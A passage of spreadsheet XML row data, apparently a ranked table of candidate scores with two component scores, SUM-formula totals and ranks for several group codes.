      <c r="C604" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D604" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E604" s="8" t="n">
        <v>54.4</v>
      </c>
      <c r="F604" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G604" s="14"/>
      <c r="H604" s="8" t="n">
        <f aca="false">SUM(E604:G604)</f>
        <v>118.4</v>
      </c>
      <c r="I604" s="14" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="605" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A605" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B605" s="8" t="n">
        <v>1314012120</v>
      </c>
      <c r="C605" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D605" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E605" s="8" t="n">
        <v>51.4</v>
      </c>
      <c r="F605" s="8" t="n">
        <v>66.8</v>
      </c>
      <c r="G605" s="14"/>
      <c r="H605" s="8" t="n">
        <f aca="false">SUM(E605:G605)</f>
        <v>118.2</v>
      </c>
      <c r="I605" s="14" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="606" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A606" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B606" s="8" t="n">
        <v>1314012115</v>
      </c>
      <c r="C606" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D606" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E606" s="8" t="n">
        <v>53.2</v>
      </c>
      <c r="F606" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="G606" s="14" t="n">
        <v>5</v>
      </c>
      <c r="H606" s="8" t="n">
        <f aca="false">SUM(E606:G606)</f>
        <v>117.6</v>
      </c>
      <c r="I606" s="14" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="607" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A607" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B607" s="8" t="n">
        <v>1314012116</v>
      </c>
      <c r="C607" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D607" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E607" s="8" t="n">
        <v>53.8</v>
      </c>
      <c r="F607" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="G607" s="14"/>
      <c r="H607" s="8" t="n">
        <f aca="false">SUM(E607:G607)</f>
        <v>116</v>
      </c>
      <c r="I607" s="14" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="608" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A608" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B608" s="8" t="n">
        <v>1314012130</v>
      </c>
      <c r="C608" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D608" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E608" s="8" t="n">
        <v>51.2</v>
      </c>
      <c r="F608" s="8" t="n">
        <v>64.8</v>
      </c>
      <c r="G608" s="14"/>
      <c r="H608" s="8" t="n">
        <f aca="false">SUM(E608:G608)</f>
        <v>116</v>
      </c>
      <c r="I608" s="14" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="609" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A609" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B609" s="8" t="n">
        <v>1314012127</v>
      </c>
      <c r="C609" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D609" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E609" s="8" t="n">
        <v>47.2</v>
      </c>
      <c r="F609" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="G609" s="14"/>
      <c r="H609" s="8" t="n">
        <f aca="false">SUM(E609:G609)</f>
        <v>113.8</v>
      </c>
      <c r="I609" s="14" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="610" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A610" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B610" s="8" t="n">
        <v>1314012201</v>
      </c>
      <c r="C610" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D610" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E610" s="8" t="n">
        <v>53.4</v>
      </c>
      <c r="F610" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="G610" s="14"/>
      <c r="H610" s="8" t="n">
        <f aca="false">SUM(E610:G610)</f>
        <v>113.6</v>
      </c>
      <c r="I610" s="14" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="611" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A611" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B611" s="8" t="n">
        <v>1314012122</v>
      </c>
      <c r="C611" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D611" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E611" s="8" t="n">
        <v>51.6</v>
      </c>
      <c r="F611" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="G611" s="14"/>
      <c r="H611" s="8" t="n">
        <f aca="false">SUM(E611:G611)</f>
        <v>113.4</v>
      </c>
      <c r="I611" s="14" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="612" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A612" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B612" s="8" t="n">
        <v>1314012126</v>
      </c>
      <c r="C612" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D612" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E612" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F612" s="8" t="n">
        <v>58</v>
      </c>
      <c r="G612" s="14"/>
      <c r="H612" s="8" t="n">
        <f aca="false">SUM(E612:G612)</f>
        <v>112.8</v>
      </c>
      <c r="I612" s="14" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="613" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A613" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B613" s="8" t="n">
        <v>1314012117</v>
      </c>
      <c r="C613" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D613" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E613" s="8" t="n">
        <v>50</v>
      </c>
      <c r="F613" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="G613" s="14"/>
      <c r="H613" s="8" t="n">
        <f aca="false">SUM(E613:G613)</f>
        <v>110.2</v>
      </c>
      <c r="I613" s="14" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="614" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A614" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B614" s="8" t="n">
        <v>1314012111</v>
      </c>
      <c r="C614" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D614" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E614" s="8" t="n">
        <v>48.2</v>
      </c>
      <c r="F614" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="G614" s="14"/>
      <c r="H614" s="8" t="n">
        <f aca="false">SUM(E614:G614)</f>
        <v>109.8</v>
      </c>
      <c r="I614" s="14" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="615" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A615" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B615" s="8" t="n">
        <v>1314012202</v>
      </c>
      <c r="C615" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D615" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E615" s="8" t="n">
        <v>52.4</v>
      </c>
      <c r="F615" s="8" t="n">
        <v>56</v>
      </c>
      <c r="G615" s="14"/>
      <c r="H615" s="8" t="n">
        <f aca="false">SUM(E615:G615)</f>
        <v>108.4</v>
      </c>
      <c r="I615" s="14" t="n">
        <v>14</v>
      </c>
    </row>
    <row r="616" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A616" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B616" s="8" t="n">
        <v>1314012129</v>
      </c>
      <c r="C616" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D616" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E616" s="8" t="n">
        <v>48.8</v>
      </c>
      <c r="F616" s="8" t="n">
        <v>58</v>
      </c>
      <c r="G616" s="14"/>
      <c r="H616" s="8" t="n">
        <f aca="false">SUM(E616:G616)</f>
        <v>106.8</v>
      </c>
      <c r="I616" s="14" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="617" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A617" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B617" s="8" t="n">
        <v>1314012113</v>
      </c>
      <c r="C617" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D617" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E617" s="8" t="n">
        <v>47</v>
      </c>
      <c r="F617" s="8" t="n">
        <v>59.6</v>
      </c>
      <c r="G617" s="14"/>
      <c r="H617" s="8" t="n">
        <f aca="false">SUM(E617:G617)</f>
        <v>106.6</v>
      </c>
      <c r="I617" s="14" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="618" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A618" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B618" s="8" t="n">
        <v>1314012114</v>
      </c>
      <c r="C618" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D618" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E618" s="8" t="n">
        <v>46</v>
      </c>
      <c r="F618" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="G618" s="14"/>
      <c r="H618" s="8" t="n">
        <f aca="false">SUM(E618:G618)</f>
        <v>100.8</v>
      </c>
      <c r="I618" s="14" t="n">
        <v>17</v>
      </c>
    </row>
    <row r="619" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A619" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B619" s="8" t="n">
        <v>1314012119</v>
      </c>
      <c r="C619" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D619" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E619" s="8" t="n">
        <v>44.4</v>
      </c>
      <c r="F619" s="8" t="n">
        <v>56.2</v>
      </c>
      <c r="G619" s="14"/>
      <c r="H619" s="8" t="n">
        <f aca="false">SUM(E619:G619)</f>
        <v>100.6</v>
      </c>
      <c r="I619" s="14" t="n">
        <v>18</v>
      </c>
    </row>
    <row r="620" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A620" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B620" s="8" t="n">
        <v>1314012124</v>
      </c>
      <c r="C620" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D620" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E620" s="8" t="n">
        <v>44.8</v>
      </c>
      <c r="F620" s="8" t="n">
        <v>52</v>
      </c>
      <c r="G620" s="14"/>
      <c r="H620" s="8" t="n">
        <f aca="false">SUM(E620:G620)</f>
        <v>96.8</v>
      </c>
      <c r="I620" s="14" t="n">
        <v>19</v>
      </c>
    </row>
    <row r="621" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A621" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B621" s="8" t="n">
        <v>1314012128</v>
      </c>
      <c r="C621" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D621" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E621" s="8" t="n">
        <v>41.8</v>
      </c>
      <c r="F621" s="8" t="n">
        <v>51.2</v>
      </c>
      <c r="G621" s="14"/>
      <c r="H621" s="8" t="n">
        <f aca="false">SUM(E621:G621)</f>
        <v>93</v>
      </c>
      <c r="I621" s="14" t="n">
        <v>20</v>
      </c>
    </row>
    <row r="622" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A622" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B622" s="8" t="n">
        <v>1314012118</v>
      </c>
      <c r="C622" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D622" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E622" s="8" t="n">
        <v>42.8</v>
      </c>
      <c r="F622" s="8" t="n">
        <v>50</v>
      </c>
      <c r="G622" s="14"/>
      <c r="H622" s="8" t="n">
        <f aca="false">SUM(E622:G622)</f>
        <v>92.8</v>
      </c>
      <c r="I622" s="14" t="n">
        <v>21</v>
      </c>
    </row>
    <row r="623" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A623" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B623" s="8" t="n">
        <v>1314012110</v>
      </c>
      <c r="C623" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D623" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E623" s="8" t="n">
        <v>31.6</v>
      </c>
      <c r="F623" s="8" t="n">
        <v>47.2</v>
      </c>
      <c r="G623" s="14"/>
      <c r="H623" s="8" t="n">
        <f aca="false">SUM(E623:G623)</f>
        <v>78.8</v>
      </c>
      <c r="I623" s="14" t="n">
        <v>22</v>
      </c>
    </row>
    <row r="624" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A624" s="15" t="n">
        <v>4300099</v>
      </c>
      <c r="B624" s="8" t="n">
        <v>1314012125</v>
      </c>
      <c r="C624" s="8" t="s">
        <v>159</v>
      </c>
      <c r="D624" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E624" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F624" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G624" s="14"/>
      <c r="H624" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I624" s="14" t="n">
        <v>23</v>
      </c>
    </row>
    <row r="625" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A625" s="8" t="n">
        <v>4300101</v>
      </c>
      <c r="B625" s="8" t="n">
        <v>1314012203</v>
      </c>
      <c r="C625" s="8" t="s">
        <v>160</v>
      </c>
      <c r="D625" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E625" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="F625" s="8" t="n">
        <v>71.4</v>
      </c>
      <c r="G625" s="8"/>
      <c r="H625" s="8" t="n">
        <f aca="false">SUM(E625:G625)</f>
        <v>137</v>
      </c>
      <c r="I625" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="626" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A626" s="8" t="n">
        <v>4300101</v>
      </c>
      <c r="B626" s="8" t="n">
        <v>1314012204</v>
      </c>
      <c r="C626" s="8" t="s">
        <v>160</v>
      </c>
      <c r="D626" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E626" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="F626" s="8" t="n">
        <v>63.2</v>
      </c>
      <c r="G626" s="8"/>
      <c r="H626" s="8" t="n">
        <f aca="false">SUM(E626:G626)</f>
        <v>121.8</v>
      </c>
      <c r="I626" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="627" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A627" s="9" t="n">
        <v>4300102</v>
      </c>
      <c r="B627" s="8" t="n">
        <v>1314012211</v>
      </c>
      <c r="C627" s="8" t="s">
        <v>161</v>
      </c>
      <c r="D627" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E627" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="F627" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="G627" s="8"/>
      <c r="H627" s="8" t="n">
        <f aca="false">SUM(E627:G627)</f>
        <v>125.6</v>
      </c>
      <c r="I627" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="628" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A628" s="9" t="n">
        <v>4300102</v>
      </c>
      <c r="B628" s="8" t="n">
        <v>1314012209</v>
      </c>
      <c r="C628" s="8" t="s">
        <v>161</v>
      </c>
      <c r="D628" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E628" s="8" t="n">
        <v>57</v>
      </c>
      <c r="F628" s="8" t="n">
        <v>68.2</v>
      </c>
      <c r="G628" s="8"/>
      <c r="H628" s="8" t="n">
        <f aca="false">SUM(E628:G628)</f>
        <v>125.2</v>
      </c>
      <c r="I628" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="629" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A629" s="9" t="n">
        <v>4300102</v>
      </c>
      <c r="B629" s="8" t="n">
        <v>1314012212</v>
      </c>
      <c r="C629" s="8" t="s">
        <v>161</v>
      </c>
      <c r="D629" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E629" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="F629" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="G629" s="8"/>
      <c r="H629" s="8" t="n">
        <f aca="false">SUM(E629:G629)</f>
        <v>123</v>
      </c>
      <c r="I629" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="630" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A630" s="9" t="n">
        <v>4300102</v>
      </c>
      <c r="B630" s="8" t="n">
        <v>1314012208</v>
      </c>
      <c r="C630" s="8" t="s">
        <v>161</v>
      </c>
      <c r="D630" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E630" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="F630" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="G630" s="8"/>
      <c r="H630" s="8" t="n">
        <f aca="false">SUM(E630:G630)</f>
        <v>121</v>
      </c>
      <c r="I630" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="631" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A631" s="9" t="n">
        <v>4300102</v>
      </c>
      <c r="B631" s="8" t="n">
        <v>1314012206</v>
      </c>
      <c r="C631" s="8" t="s">
        <v>161</v>
      </c>
      <c r="D631" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E631" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F631" s="8" t="n">
        <v>63.4</v>
      </c>
      <c r="G631" s="8"/>
      <c r="H631" s="8" t="n">
        <f aca="false">SUM(E631:G631)</f>
        <v>119.8</v>
      </c>
      <c r="I631" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="632" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A632" s="9" t="n">
        <v>4300102</v>
      </c>
      <c r="B632" s="8" t="n">
        <v>1314012207</v>
      </c>
      <c r="C632" s="8" t="s">
        <v>161</v>
      </c>
      <c r="D632" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E632" s="8" t="n">
        <v>47.8</v>
      </c>
      <c r="F632" s="8" t="n">
        <v>67</v>
      </c>
      <c r="G632" s="8"/>
      <c r="H632" s="8" t="n">
        <f aca="false">SUM(E632:G632)</f>
        <v>114.8</v>
      </c>
      <c r="I632" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="633" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A633" s="9" t="n">
        <v>4300102</v>
      </c>
      <c r="B633" s="8" t="n">
        <v>1314012210</v>
      </c>
      <c r="C633" s="8" t="s">
        <v>161</v>
      </c>
      <c r="D633" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E633" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="F633" s="8" t="n">
        <v>58.4</v>
      </c>
      <c r="G633" s="8"/>
      <c r="H633" s="8" t="n">
        <f aca="false">SUM(E633:G633)</f>
        <v>114.2</v>
      </c>
      <c r="I633" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="634" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A634" s="9" t="n">
        <v>4300102</v>
      </c>
      <c r="B634" s="8" t="n">
        <v>1314012205</v>
      </c>
      <c r="C634" s="8" t="s">
        <v>161</v>
      </c>
      <c r="D634" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E634" s="8" t="n">
        <v>50.6</v>
      </c>
      <c r="F634" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="G634" s="8"/>
      <c r="H634" s="8" t="n">
        <f aca="false">SUM(E634:G634)</f>
        <v>110.8</v>
      </c>
      <c r="I634" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="635" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A635" s="9" t="n">
        <v>4300102</v>
      </c>
      <c r="B635" s="8" t="n">
        <v>1314012214</v>
      </c>
      <c r="C635" s="8" t="s">
        <v>161</v>
      </c>
      <c r="D635" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E635" s="8" t="n">
        <v>45.4</v>
      </c>
      <c r="F635" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="G635" s="8"/>
      <c r="H635" s="8" t="n">
        <f aca="false">SUM(E635:G635)</f>
        <v>100.8</v>
      </c>
      <c r="I635" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="636" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A636" s="9" t="n">
        <v>4300102</v>
      </c>
      <c r="B636" s="8" t="n">
        <v>1314012213</v>
      </c>
      <c r="C636" s="8" t="s">
        <v>161</v>
      </c>
      <c r="D636" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E636" s="8" t="n">
        <v>39</v>
      </c>
      <c r="F636" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="G636" s="8"/>
      <c r="H636" s="8" t="n">
        <f aca="false">SUM(E636:G636)</f>
        <v>93.6</v>
      </c>
      <c r="I636" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="637" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A637" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B637" s="8" t="n">
        <v>1314012222</v>
      </c>
      <c r="C637" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D637" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E637" s="8" t="n">
        <v>67</v>
      </c>
      <c r="F637" s="8" t="n">
        <v>70.4</v>
      </c>
      <c r="G637" s="8"/>
      <c r="H637" s="8" t="n">
        <f aca="false">SUM(E637:G637)</f>
        <v>137.4</v>
      </c>
      <c r="I637" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="638" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A638" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B638" s="8" t="n">
        <v>1314012310</v>
      </c>
      <c r="C638" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D638" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E638" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="F638" s="8" t="n">
        <v>75.4</v>
      </c>
      <c r="G638" s="8"/>
      <c r="H638" s="8" t="n">
        <f aca="false">SUM(E638:G638)</f>
        <v>136.2</v>
      </c>
      <c r="I638" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="639" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A639" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B639" s="8" t="n">
        <v>1314012229</v>
      </c>
      <c r="C639" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D639" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E639" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="F639" s="8" t="n">
        <v>68.6</v>
      </c>
      <c r="G639" s="8"/>
      <c r="H639" s="8" t="n">
        <f aca="false">SUM(E639:G639)</f>
        <v>130.2</v>
      </c>
      <c r="I639" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="640" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A640" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B640" s="8" t="n">
        <v>1314012218</v>
      </c>
      <c r="C640" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D640" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E640" s="8" t="n">
        <v>65.4</v>
      </c>
      <c r="F640" s="8" t="n">
        <v>63.8</v>
      </c>
      <c r="G640" s="8"/>
      <c r="H640" s="8" t="n">
        <f aca="false">SUM(E640:G640)</f>
        <v>129.2</v>
      </c>
      <c r="I640" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="641" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A641" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B641" s="8" t="n">
        <v>1314012306</v>
      </c>
      <c r="C641" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D641" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E641" s="8" t="n">
        <v>61.4</v>
      </c>
      <c r="F641" s="8" t="n">
        <v>67</v>
      </c>
      <c r="G641" s="8"/>
      <c r="H641" s="8" t="n">
        <f aca="false">SUM(E641:G641)</f>
        <v>128.4</v>
      </c>
      <c r="I641" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="642" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A642" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B642" s="8" t="n">
        <v>1314012313</v>
      </c>
      <c r="C642" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D642" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E642" s="8" t="n">
        <v>54.2</v>
      </c>
      <c r="F642" s="8" t="n">
        <v>72.2</v>
      </c>
      <c r="G642" s="8"/>
      <c r="H642" s="8" t="n">
        <f aca="false">SUM(E642:G642)</f>
        <v>126.4</v>
      </c>
      <c r="I642" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="643" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A643" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B643" s="8" t="n">
        <v>1314012312</v>
      </c>
      <c r="C643" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D643" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E643" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="F643" s="8" t="n">
        <v>68.2</v>
      </c>
      <c r="G643" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H643" s="8" t="n">
        <f aca="false">SUM(E643:G643)</f>
        <v>124</v>
      </c>
      <c r="I643" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="644" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A644" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B644" s="8" t="n">
        <v>1314012223</v>
      </c>
      <c r="C644" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D644" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E644" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="F644" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="G644" s="8"/>
      <c r="H644" s="8" t="n">
        <f aca="false">SUM(E644:G644)</f>
        <v>123.4</v>
      </c>
      <c r="I644" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="645" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A645" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B645" s="8" t="n">
        <v>1314012221</v>
      </c>
      <c r="C645" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D645" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E645" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="F645" s="8" t="n">
        <v>68.2</v>
      </c>
      <c r="G645" s="8"/>
      <c r="H645" s="8" t="n">
        <f aca="false">SUM(E645:G645)</f>
        <v>122.8</v>
      </c>
      <c r="I645" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="646" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A646" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B646" s="8" t="n">
        <v>1314012307</v>
      </c>
      <c r="C646" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D646" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E646" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="F646" s="8" t="n">
        <v>64.6</v>
      </c>
      <c r="G646" s="8"/>
      <c r="H646" s="8" t="n">
